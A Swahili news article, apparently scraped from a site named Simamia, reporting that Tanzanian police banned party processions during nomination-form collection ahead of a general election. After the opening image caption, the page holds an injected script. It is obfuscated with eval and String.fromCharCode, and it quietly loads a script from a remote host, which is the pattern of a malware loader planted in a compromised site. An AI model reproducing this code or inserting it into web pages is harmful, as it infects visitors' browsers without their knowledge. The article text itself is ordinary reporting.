<p>Bendera ya jeshi la Polisi nchini Tanzania.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
JESHI la Polisi nchini, limesitisha maandamano ya aina zote kutoka kwa wafuasi wa vyama vya siasa wakati wa kwenda kuchukua fomu ya kusaka wadhamini na kuzirejesha ili kuepusha usumbufu kwa watu wengine.
Naibu Inspekta Jenerali wa Polisi, Abdulrahman Kaniki, aliyasema hayo Dar es Salaam jana wakati akizungumza na waandishi wa habari juu ya suala zima la ulinzi, usalama kipindi hiki cha kuelekea Uchaguzi Mkuu.
Alisema jeshi hilo limelazimika kutoa amri hiyo baada ya kupokea malalamiko kutokana na maandamano yaliyofanywa na wafuasi wa Chama Cha Mapinduzi (CCM) na CHADEMA
“Wafuasi wa vyama hivi waliwasindikiza wagombea wao wa nafasi ya urais kwa maandamano makubwa ili kwenda kuchukua fomu za kuomba kugombea urais wa Jamhuri ya Muungano kwenye Ofisi za Tume ya Taifa ya Uchaguzi (NEC), zilizopo Posta.
“Katika maandamano hayo, kulikuwa na ukiukwaji mkubwa wa sheria za usalama barabarani, watu walitembea kwa miguu, magari, pikipiki, baiskeli jambo ambalo lilisababisha usumbufu kwa wananchi,” alisema.
Aliongeza kuwa, wananchi wengi walidai kushindwa kufika katika shughuli zao za kiuchumi na kijamii kwa wakati na wengine makazini na watu kukosa huduma za kijamii kutokana na maduka kufungwa, wagonjwa kutofika hospitali kwa wakati kutokana na misafara mirefu.
Alisema jeshi hilo linaweka utaratibu wa kuwakutanisha wadau wote wa siasa wakiwemo viongozi wa vyama vya siasa ili kuangalia namna bora ya kuhakikisha mchakato wa uchaguzi unafanyika kwa amani na utulivu.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments